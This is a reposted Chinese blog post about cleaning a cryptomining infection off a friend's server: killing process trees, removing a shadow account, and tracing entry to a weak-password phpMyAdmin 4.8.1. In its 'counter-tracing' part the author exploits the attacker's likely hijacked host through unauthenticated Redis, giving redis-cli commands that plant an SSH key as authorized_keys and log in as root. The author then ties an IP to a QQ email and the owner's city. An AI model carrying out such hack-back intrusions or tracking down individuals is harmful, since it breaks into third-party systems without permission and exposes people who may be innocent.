转载自公众号:酒仙桥六号部队

前言

朋友说自己服务器巨卡,里边放了一堆项目资料,环境也集成一大堆,身为他bb,义不容辞,必须给他看看,本来以为挺简单的,给杀杀毒,清理一下文件就ok了,没想到搞了挺久,正好写这篇文章记录一下。

2

清除病毒

问了问朋友有没有下载啥东西,电脑上有没有什么搭建什么鬼东西,一律回复不知道,让我自己看,当场就想顺着3389过去给他个大嘴巴子。想了想算了,还得自己来,一手任务管理器,一眼看到几个可疑的powershell进程
图片

可以看到PowerShell进程的占用率排在了最前面,不过无法确定PowerShell执行了什么命令,这时候可以使用WMIC查看进程执行时的命令行参数
参数释义:
Caption 进程名
CommandLine 命令行参数
ParentProcessId 父进程PID
Process 进程PID

图片

可以看到PowerShell执行了一段经混淆的代码,一般正常程序都不会这么执行命令,市面很多有很多分析工具,使用火绒剑、ProcExp、ProcessHacker查看命令行参数也是都可以的

图片

直接使用火绒剑结束该进程,之后powershell进程再次出现,那肯定是存在守护进程,刚刚结束的应该是个子进程,此时需要结束进程树才能彻底根除,找到powershell的父进程,结束进程树,防止挖矿程序再次启动

图片

说一下怎么查找相关关联进程,可以使用wmic命令,找到相关进程

图片

找到进程id 3616

图片

找到进程id 3604

图片

找到3500,这样即可找到相关关联进程

图片

这里以火绒剑为例,查看进程,最下面5个PowerShell进程是PID为3652的PowerShell的子进程PID为1972的scvhost.exe是所有挖矿程序的父进程

图片

直接结束进程树

图片

清理工作完成。

3

审计日志

最重要的是怎么进来的,重点看了看RDP日志,打开安全日志(4624登录成功,4625登录失败),确实发现有登陆成功的日志

图片

随即看了看注册表有没有新建账户,果然有个影子账户

图片

随即删除账户,看了看启动项,就知道

图片

删除启动项

图片

查看计划任务

图片

为了确保该进程与启动项一致,这里算了一下MD5值

certrutil -hashfile file MD5

图片

同样全部删除,总算弄完了,之后在进程中我竟然发现了phpstudy....,没错,桌面没有图标,我就直接忽略了,草率了

图片

反手拿了WebShellKiller对全局文件进行扫描

图片

图片

???没出来,找了个火绒病毒查杀也是一样的效果

图片

我不太信,怎么可能没后门,直接在www目录下挨个翻文件,翻吐了快,在这里浪费了很久很久时间,终于找到了news.php,不点开看都不知道,免杀做的挺牛逼啊

图片

清除掉后,收获免杀马一枚,随后查看web日志,在apache access.log、error.log两个日志文件中发现访问ip

xx.xx.xx.xx - - [14/Dec/2020:14:26:37 +0800] "POST /phpMyAdmin-4.8.1-all-languages/version_check.php HTTP/1.1" 200 28

xx.xx.xx.xx - - [14/Dec/2020:14:26:46 +0800] "POST /phpMyAdmin-4.8.1-all-languages/logout.php HTTP/1.1" 302 8637

xx.xx.xx.xx - - [14/Dec/2020:14:26:51 +0800] "GET /phpMyAdmin-4.8.1-all-languages/index.php HTTP/1.1" 200 3497

phpmyadmin的版本还是4.8.1的

图片

刚开始以为是直接爆破进来的,此时一切都明了,谁会拒绝root/root,反正我不会,用脚趾头都能想到朋友不会设置复杂密码。

4

反查追踪

确认了入侵点,清理也已经完成,并且拿到了攻击ip,尝试溯源,打开微步

图片

图片

18年就被标记傀儡机,还是一台日本机子,够呛溯源找到攻击者,大概率是肉鸡,此时想到还有挖矿样本,先看看样本吧,把主程序放在沙箱跑一下,还有一个批处理文件,一个windows命令文件,其余的是无用混淆文件

Cmd1.bat 安装Networkss恶意服务,自启动start.cmd脚本,并将nat目录下所有文件权限修改为只读的隐藏系统文件。

start.cmd 启动挖矿主程序,访问矿池地址

svchost.exe 将自定义服务封装为系统服务

Systems.exe 挖矿主程序

样本名称 systems.exe

样本大小 3662336

MD5 4d8a76f89b0a68a6d5fc5b1b95257ec0

SHA1 d25a722636f2c1de313d481733b9c397925675eb

SHA256 eb1d6f905efcb27544c43e9107735a2160c3fa7180eff121a701dc6655ae0242

图片

返回头再看看哪个肉鸡,用插件简单看了一下,发现6379开放,随即使用namp详细探测一下

nmap -A -p 6379 script redis-info + ip

图片

直接尝试远程登录一下,居然能直接可以登录。。。

图片

图片

该你被抓鸡,你不当鸡谁当,在确认有未授权漏洞后,尝试利用,redis利用方式有

好几种

1> redis直接写入webshell,但是需要绝对路径,写入权限也要有

2> 写入ssh公钥文件使用私钥登录

3> 写入crontab计划任务反弹shell

4> 主从复制rce

这里使用第二种,因为之前探测发现ssh服务也是开启的

1、首先本地生成公私钥文件

ssh-keygen -t rsa

2、将密钥上传到目标主机redis

cat test.txt | redis-cli -h xx.xx.xx.xx -x set crackit

redis-cli -h xx.xx.xx.xx

config set dir /root/.ssh/

config get dir/

3、保存为authorized_keys

config set dbfilename "authorized_keys"

save

4、直接使用ssh登录成功

ssh -i id_rsa root@x.x.x.x

图片

上去后先netstat看了一下,明晃晃的一个外连ip

图片

定位到相关的pid进程,发现了外连地址,纯ip的

图片

继续查看了有谁登录过这台主机,通过查看/var/log/wtmp日志

last /var/log/wtmp

根据windows被入侵日志时间段筛选了一遍,还真的在这个时间段找到了这个ip地址,用户是root,很大概率这个外连地址就是攻击者的真实服务器了

wangjy ? pts/9 ? ? ? xx.xx.xx.xx ?Thu Dec 17 10:15 ? still logged in ??

wangjy ? pts/8 ? ? ? xx.xx.xx.xx ?Thu Dec 17 09:56 ? still logged in ??

wangjy ? pts/7 ? ? ? xx.xx.xx.xx ?Thu Dec 17 09:32 - 10:44 ?(01:12) ? ?

root ? ? pts/5 ? ? ?xx.xx.xx.xx ? Thu Dec 17 09:30 - 10:20 ?(00:50) ? ?

root ? ? pts/4 ? ? ?xx.xx.xx.xx ? Thu Dec 17 09:30 - 10:20 ?(00:50) ?

Whois查询了一下ip

图片

成功关联到了qq邮箱,运气真的好

图片

直接搜索添加qq,一个SVIP9大佬,地点精确到某省市区

图片

但是没有手机号,空间动态也看不到,把邮箱扔在reg007查了一遍,什么都没有

图片

至此就收工了,也不知道找的目标人物到底准确不准确,之后就给朋友顺手装了360,火绒也没卸载,让他没事别瞎开服务。

5

总结

1、首先定位问题原因,确认中了木马

2、对进程,启动项,计划任务,后门,账户全部进行清除

3、通过审计主机、web日志定位入口点

4、反追踪拿到肉鸡权限,发现外连地址

5、溯源定位到具体人(不一定百分百是)

原文地址:https://mp.weixin.qq.com/s/xW2u4s8xCTnLCkpDoK5Yzw


http://www.taodudu.cc/news/show-1490438.html

相关文章:

  • 技巧|BurpSuite实现监听代理流量,隐匿身份
  • 深度解读SSH免密登录
  • Python解析access数据库(mdb文件或者accdb文件)
  • 根据excel批量归类文件
  • 2013年蓝桥杯题集C本科B
  • 最高的奖励 贪心
  • 蓝桥杯2013年省赛C/C++大学组 C/C++
  • 非常可乐 BFS
  • 牛客寒假算法基础训练营3
  • 蓝桥杯2014年省赛C/C++ 本科B组
  • DeBruijin DFS
  • 牛客寒假算法基础训练营5
  • Being a good boy in the spring festival NIM博弈
  • Problem F. Grab The Tree博弈
  • 牛客寒假算法基础训练营6
  • 还是畅通工程 最小生成树
  • 食物链 并查集
  • 蓝桥杯2015 C语言大学B组 C/C++
  • STL常用函数总结-vector
  • STL常用函数总结-stack
  • STL常用函数总结-queue+priority_queue
  • STL常用函数总结-map
  • STL常用函数总结-set
  • 畅通工程再续 最小生成树
  • Minimum Inversion Number 线段树
  • 2015年C语言组混搭 C/C++
  • 蓝桥杯 2016年C语言组大学B组 C/C++
  • Aizu ITP2_6_A 二分
  • Hihocoder 1142 三分
  • Tr A 矩阵快速幂

记一次反制追踪溯本求源相关推荐

  1. java 池化_溯本求源: JAVA线程池工作原理

    1. 前言 线程池是JAVA开发中最常使用的池化技术之一,可以减少线程资源的重复创建与销毁造成的开销. 2. 灵魂拷问:怎么做到线程重复利用? 很多同学会联想到连接池,理所当然的说:需要的时候从池中取 ...

  2. 记一次逆向追踪请求ip的经历

    记一次逆向追踪请求ip的经历 事发 应急处理 寻找问题原因 封锁请求进入 定位请求的内网ip 事发 某日下午,部门使用的测试环境出现问题,所有集成测试case都执行失败.查询测试用服务器发现是磁盘已满 ...

  3. python体验课是上纯代码_大陈教初中生学Python,入门体验第二课教学设计,溯本追源...

    第一课我们已经对Python有了一定的了解,那么接下来再通过补充程序.改正程序.编写程序,和学生一起明确变量.常量.表达式.数据类型.赋值语句.输入输出语句.数据类型转换函数.算术运算符等基础知识,溯 ...

  4. 【计算机网络】——习题解析:UDP 用户数据报的首部十六进制表示是:06 32 00 45 00 1C E2 17,试求源端口、目的端口、 用户数据报的总长度、数据部分长度等

    UDP 用户数据报的首部十六进制表示是:06 32 00 45 00 1C E2 17,试求源端口.目的端口. 用户数据报的总长度.数据部分长度.这个用户数据报是从客户发送给服务器发送给客户?使用 U ...

  5. Gateway+Nacos+Sleuth+Zipkin网关链路追踪(测试及源码),Gateway+FeignClient+Nacos通过网关远程调用微服务(一)

    Gateway+Nacos+Sleuth+Zipkin网关链路追踪(测试及源码),Gateway+FeignClient+Nacos通过网关远程调用微服务(一) 问题背景 Gateway+Nacos+ ...

  6. 记一个有趣的算法题:求n的阶乘最后一位非零数字

    今天领导录题的时候问了一个题,使我陷入了迷茫.原题目是这样的:给出n,求n的阶乘的结果的最后一位非零数字,和末尾0的个位数.例如 n = 12 n=12 n=12, 则 n ! = 1 × 2 × . ...

  7. c语言求婚代码大全,程序员七夕用40行代码向女友求婚成功,网友:求源码

    今天刚来上班道学数里屏.中近,期据面蔽最,近,期据面逛下论坛,看到了一位浪漫程序员用代码向女朋友求婚,小编我也运行了下他分享的代码,挺有意思的今天就分享给大伙了,源码文末有领取地址.谁说程序员只是个敲 ...

  8. 寻根求源 U盘的9个典型故障

    U盘以其小巧玲珑,存储方便而大行其道,但我们经常受这"小家伙"的忽悠.如何不再被它的忽悠,让他忠实地为我们服役呢? 案例1:为什么将U盘插入电脑会出现两个盘符? 原因: 1)可能是 ...

  9. 谈及未来的 AI, 也许你已身处其中 —— 记 InfoQ 对青云QingCloud 联合创始人林源的采访...

    AI(人工智能)一词,可能早已经烂大街了,说起它,桥下贴膜的小哥也能和你说出个一二三来.这是一个玩笑,但也说明 AI 的火热.而 AI 技术以计算.数据.算法为三大基础,若没有云计算产业的成熟,AI ...

最新文章

  1. 用xfire开发webservice实例
  2. python mysql链接安全_Python最佳实践和最安全的方法来连接MySQL和执行查询
  3. 【渝粤教育】广东开放大学 网络完全与技术 形成性考核 (44)
  4. React开发(280):moment处理日期
  5. 根本无处可避的广东三游
  6. Flutter ClipPath 自定义CustomClipper 玩转不一样的背景图案
  7. EXCEL怎么按照数字大小排列
  8. android dialog一个按钮,7种形式的Android Dialog使用实例
  9. 对话Ruby创始人松本行弘、阿里高级技术专家朴灵!
  10. 2021年N1叉车司机免费试题及N1叉车司机模拟试题
  11. android支持u盘格式文件,安卓系统OTG支持U盘格式
  12. spss进行多元线性回归并分析表格
  13. matlab保存bln文件,气象万千(冯锦明课题组)-软件程序
  14. 计算机专用英语词汇1500词
  15. Windows 下安装 TensorFlow 2.2 GPU 版 教程:坑多,整理出来方便大家
  16. 著者四角号码查询_著者姓名汉语拼音与四角号码数字混编书次号的应用
  17. Unity3D教程:手游开发常用排序算法 -下
  18. 致读者:冰河技术微信公众号的重大调整!!
  19. 浅析各大行业信息化以及云计算应用现状
  20. Linux | 人生苦短,我用Vim【最受欢迎的编辑器】

热门文章

  1. Maven创建servlet项目演示(三)
  2. swing学习一(swing介绍、swing样例、布局管理器)
  3. UVA 10115 Automatic Editing
  4. poj 2051 Argus
  5. LeetCode_database刷题记录(627. 交换工资)
  6. DocumentHelper用法
  7. 【洛谷】P1357 花园(状压+矩阵快速幂)
  8. 博客园修改页面显示样式
  9. 视觉里程计07 Qt的一些bug修改记录
  10. Ubuntu14.04下配置固定IP